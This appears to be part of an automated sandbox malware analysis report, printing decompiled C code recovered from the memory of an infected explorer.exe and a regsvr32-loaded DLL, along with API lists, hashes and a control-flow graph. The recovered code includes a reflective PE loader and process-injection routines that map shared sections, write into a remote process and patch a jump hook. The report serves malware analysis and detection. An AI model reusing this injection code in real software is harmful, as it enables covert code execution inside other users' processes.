                            0x0009308c
                            0x0009308f
                            0x00093091
                            0x00093094
                            0x00093096
                            0x000930b1
                            0x000930b1
                            0x000930b5
                            0x000930b8
                            0x000930bb
                            0x000930be
                            0x000930d4
                            0x000930d4
                            0x000930d4
                            0x000930c0
                            0x000930c0
                            0x000930c2
                            0x000930c6
                            0x000930c9
                            0x00000000
                            0x000930cb
                            0x000930cb
                            0x000930cd
                            0x00000000
                            0x000930cf
                            0x000930cf
                            0x000930cf
                            0x000930cd
                            0x000930c9
                            0x000930d8
                            0x000930db
                            0x000930e0
                            0x000930ea
                            0x000930ea
                            0x000930ea
                            0x000930ed
                            0x00093098
                            0x00093098
                            0x0009309a
                            0x000930a1
                            0x000930a1
                            0x000930a3
                            0x000930a5
                            0x000930a7
                            0x000930ab
                            0x000930ad
                            0x000930af
                            0x00000000
                            0x00000000
                            0x000930af
                            0x000930ab
                            0x0009309c
                            0x0009309c
                            0x0009309f
                            0x00000000
                            0x00000000
                            0x0009309f
                            0x0009309a
                            0x000930f7
                            0x000930f9
                            0x000930f9
                            0x00093104
                            0x00092fa7
                            0x00092fa7
                            0x00092faa
                            0x00000000
                            0x00092fac
                            0x00092fac
                            0x00092fae
                            0x00092fb2
                            0x00000000
                            0x00092fb4
                            0x00092fb4
                            0x00092fb4
                            0x00092fb7
                            0x00000000
                            0x00092fbb
                            0x00092fc4
                            0x00092fc4
                            0x00092fb7
                            0x00092fb2
                            0x00092faa
                            0x00092f96
                            0x00092f9f
                            0x00092f9f

                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                            • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                            • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00092AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 52%
                            			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























                            0x00092afb
                            0x00092b01
                            0x00092b0a
                            0x00092b0d
                            0x00092b10
                            0x00000000
                            0x00092c01
                            0x00092c05
                            0x00092c07
                            0x00092c15
                            0x00092d33
                            0x00092d3c
                            0x00092d3f
                            0x00092d43
                            0x00092d49
                            0x00092d51
                            0x00092d51
                            0x00092d59
                            0x00000000
                            0x00092d64
                            0x00092c1b
                            0x00092c24
                            0x00092c32
                            0x00092c35
                            0x00092c52
                            0x00092c59
                            0x00092c6b
                            0x00092c6b
                            0x00092c72
                            0x00092c82
                            0x00092c9a
                            0x00092c84
                            0x00092c8c
                            0x00092c8c
                            0x00092c9d
                            0x00092ca1
                            0x00092cb1
                            0x00092cd4
                            0x00092ce6
                            0x00092cb3
                            0x00092cc7
                            0x00092cc7
                            0x00092cf0
                            0x00092d0c
                            0x00092cf2
                            0x00092d01
                            0x00092d01
                            0x00092d14
                            0x00092d1d
                            0x00092d1d
                            0x00092d2b
                            0x00000000
                            0x00092c74
                            0x00092c76
                            0x00000000
                            0x00092c76
                            0x00092c72
                            0x00000000
                            0x00092c35
                            0x00092b18
                            0x00092b26
                            0x00092b2b
                            0x00092b36
                            0x00092b39
                            0x00092b3d
                            0x00092b3f
                            0x00092b4f
                            0x00092b58
                            0x00092b61
                            0x00092b69
                            0x00092b72
                            0x00092b7d
                            0x00092b83
                            0x00092b86
                            0x00092b89
                            0x00092b90
                            0x00092b97
                            0x00000000
                            0x00000000
                            0x00092ba2
                            0x00092bb0
                            0x00092bbb
                            0x00092bc5
                            0x00092bdd
                            0x00092bea
                            0x00092bea
                            0x00092bc7
                            0x00092bd2
                            0x00092bd2
                            0x00092bf1
                            0x00092bf1
                            0x00092bf9
                            0x00092bf9
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                            • LoadLibraryA.KERNEL32(?), ref: 00092C65
                            • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 384173800-0
                            • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                            • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                            • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                            • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00081C68, Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x1d8
				_t13 = E0008A4BF(_t41, 0);
				while(_t13 < 0) {
					E0008980C( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0x286f8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0x286f8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x1d8
						__eflags = 0;
						_t13 = E0008A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0x286ffa8
				_v28 = _t20;
				_t22 = E0008A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E0008980C(0x9e6e0);
					_t64 = E00081A1B( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0x286f8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x1d8
				 *0x9e6d0 = 0;
				E0008A4DB(_t48);
				E0008861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

























                            0x00081c68
                            0x00081c75
                            0x00081c77
                            0x00081c7e
                            0x00081ce4
                            0x00081c8b
                            0x00081c90
                            0x00081c96
                            0x00081c9b
                            0x00081ca1
                            0x00081ca3
                            0x00081ca7
                            0x00081d15
                            0x00081d17
                            0x00081d99
                            0x00081d9f
                            0x00081d9f
                            0x00081ca9
                            0x00081cb1
                            0x00081cb1
                            0x00081cbd
                            0x00081cc3
                            0x00081cc5
                            0x00000000
                            0x00000000
                            0x00081cc7
                            0x00081cd1
                            0x00081cd7
                            0x00081cdd
                            0x00081cdf
                            0x00000000
                            0x00081cdf
                            0x00081cab
                            0x00081caf
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00081caf
                            0x00081cee
                            0x00081cef
                            0x00081cf0
                            0x00081cf1
                            0x00081cf2
                            0x00081cf7
                            0x00081d01
                            0x00081d06
                            0x00081d0e
                            0x00081d29
                            0x00081d2c
                            0x00081d36
                            0x00081d41
                            0x00081d54
                            0x00081d56
                            0x00081d58
                            0x00081d5a
                            0x00081d5b
                            0x00081d63
                            0x00081d64
                            0x00081d6a
                            0x00081d10
                            0x00081d10
                            0x00081d10
                            0x00081d6b
                            0x00081d76
                            0x00081d79
                            0x00081d7f
                            0x00081d85
                            0x00081d90
                            0x00081d97
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
                            • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                            • Opcode Fuzzy Hash: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
                            • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00081B2D, Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E00081B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x1d4
				_t12 = E0008A4BF(_t38, 0);
				while(_t12 < 0) {
					E0008980C( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0x286f8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0x286f8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x1d4
								__eflags = 0;
								_t12 = E0008A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E0008980C(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0x286ffa8
				_v28 = _t24;
				_t61 = E00081A1B( &_v28, E0008131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089F06(_t48);
				}
				if(_v24 != 0) {
					E00086890( &_v24);
				}
				_t26 =  *0x9e684; // 0x286f8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x1d4
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























                            0x00081b2d
                            0x00081b33
                            0x00081b41
                            0x00081baf
                            0x00081b4e
                            0x00081b53
                            0x00081b59
                            0x00081b5e
                            0x00081b64
                            0x00081b66
                            0x00081b6a
                            0x00081c64
                            0x00081c64
                            0x00081b70
                            0x00081b70
                            0x00081b7c
                            0x00081b7c
                            0x00081b88
                            0x00081b8e
                            0x00081b90
                            0x00000000
                            0x00081b92
                            0x00081b92
                            0x00081b9c
                            0x00081ba2
                            0x00081ba8
                            0x00081baa
                            0x00000000
                            0x00081baa
                            0x00081b72
                            0x00081b72
                            0x00081b76
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00081b76
                            0x00081b70
                            0x00081c5d
                            0x00081c63
                            0x00081c63
                            0x00081bb8
                            0x00081bcc
                            0x00081bcf
                            0x00081bd9
                            0x00081be5
                            0x00081bef
                            0x00081bf0
                            0x00081bf1
                            0x00081bf2
                            0x00081bf7
                            0x00081c00
                            0x00081c04
                            0x00081c06
                            0x00081c07
                            0x00081c0f
                            0x00081c10
                            0x00081c16
                            0x00081c1b
                            0x00081c21
                            0x00081c21
                            0x00081c26
                            0x00081c31
                            0x00081c34
                            0x00081c3c
                            0x00081c48
                            0x00081c4b
                            0x00081c51
                            0x00081c56
                            0x00081c5b
                            0x00000000

                            APIs
                            • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                            • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                            • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                            • DuplicateHandle.KERNEL32 ref: 00081BD9
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Current$Process$DuplicateHandleThread
                            • String ID:
                            • API String ID: 3566409357-0
                            • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                            • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                            • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                            • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: regsvr32.exe PID: 2984 Parent PID: 2932 regsvr32.exeCOMMON

                            Executed Functions

                            Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200nativeregistrymemoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 86%
                            			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x1930590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x19afbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x1930590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}


























                            0x1000c6c6
                            0x1000c6cd
                            0x1000c6cf
                            0x1000c6d1
                            0x1000c6d3
                            0x1000c6d6
                            0x1000c6d9
                            0x1000c6dc
                            0x1000c6df
                            0x1000c6e2
                            0x1000c6e5
                            0x1000c6ef
                            0x1000c6f2
                            0x1000c6f9
                            0x1000c6fe
                            0x1000c6fe
                            0x1000c704
                            0x1000c706
                            0x1000c70f
                            0x1000c8b5
                            0x1000c8b9
                            0x1000c8be
                            0x1000c8c4
                            0x1000c8c7
                            0x1000c8c7
                            0x1000c8cb
                            0x1000c8d0
                            0x1000c8e2
                            0x1000c8e2
                            0x1000c8eb
                            0x1000c8f5
                            0x1000c8f5
                            0x1000c8fc
                            0x1000c8fc
                            0x1000c71e
                            0x1000c738
                            0x00000000
                            0x00000000
                            0x1000c743
                            0x1000c74d
                            0x1000c757
                            0x1000c75a
                            0x1000c760
                            0x1000c767
                            0x1000c768
                            0x1000c769
                            0x1000c772
                            0x1000c773
                            0x1000c774
                            0x1000c776
                            0x1000c779
                            0x1000c77c
                            0x1000c77f
                            0x1000c782
                            0x1000c78e
                            0x1000c7b0
                            0x1000c7b8
                            0x1000c7bb
                            0x1000c7c6
                            0x1000c7c6
                            0x1000c7b8
                            0x1000c7f1
                            0x1000c8b2
                            0x00000000
                            0x1000c7f7
                            0x1000c803
                            0x1000c818
                            0x00000000
                            0x00000000
                            0x1000c82e
                            0x1000c830
                            0x1000c837
                            0x00000000
                            0x00000000
                            0x1000c848
                            0x1000c85f
                            0x1000c86f
                            0x1000c87b
                            0x1000c880
                            0x1000c886
                            0x1000c896
                            0x1000c8a2
                            0x1000c8aa
                            0x00000000
                            0x1000c8aa

                            APIs
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                            • RegisterClassExA.USER32 ref: 1000C785
                            • CreateWindowExA.USER32 ref: 1000C7B0
                            • DestroyWindow.USER32 ref: 1000C7BB
                            • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
                            • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
                            • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
                            • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
                            • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
                            • NtClose.NTDLL(00000000), ref: 1000C8F5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                            • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                            • API String ID: 2002808388-2319545179
                            • Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                            • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
                            • Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                            • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 167 1000cb77-1000cb90 call 1000c4ce 170 1000cb96-1000cba4 call 1000c6c0 167->170 171 1000cc69-1000cc70 167->171 170->171 178 1000cbaa-1000cbe1 memset 170->178 172 1000cc80-1000cc87 171->172 173 1000cc72-1000cc79 FreeLibrary 171->173 175 1000cca3-1000cca9 172->175 176 1000cc89-1000cca2 call 1000861a 172->176 173->172 176->175 178->171 182 1000cbe7-1000cc27 NtProtectVirtualMemory 178->182 184 1000cc67 182->184 185 1000cc29-1000cc44 NtWriteVirtualMemory 182->185 184->171 185->184 186 1000cc46-1000cc65 NtProtectVirtualMemory 185->186 186->171 186->184
                            C-Code - Quality: 93%
                            			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				void* _v568;
				void _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				intOrPtr _t43;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744 = 0x10002;
						_push( &_v744);
						_t43 =  *0x1001e684; // 0x19afaa0
						_push(_t73[1]);
						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
							_t70 = _v568;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
					_t35 =  *0x1001e684; // 0x19afaa0
					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
					E1000861A(0x1001e784, 0xfffffffe);
				}
				return _t74;
			}
























                            0x1000cb83
                            0x1000cb85
                            0x1000cb87
                            0x1000cb90
                            0x1000cb9b
                            0x1000cba0
                            0x1000cba4
                            0x1000cbb8
                            0x1000cbc0
                            0x1000cbd0
                            0x1000cbd1
                            0x1000cbd6
                            0x1000cbe1
                            0x1000cbe7
                            0x1000cbef
                            0x1000cbfd
                            0x1000cc03
                            0x1000cc04
                            0x1000cc10
                            0x1000cc17
                            0x1000cc27
                            0x1000cc67
                            0x1000cc67
                            0x1000cc46
                            0x1000cc46
                            0x1000cc65
                            0x00000000
                            0x00000000
                            0x1000cc65
                            0x1000cc27
                            0x1000cbe1
                            0x1000cba4
                            0x1000cc69
                            0x1000cc70
                            0x1000cc73
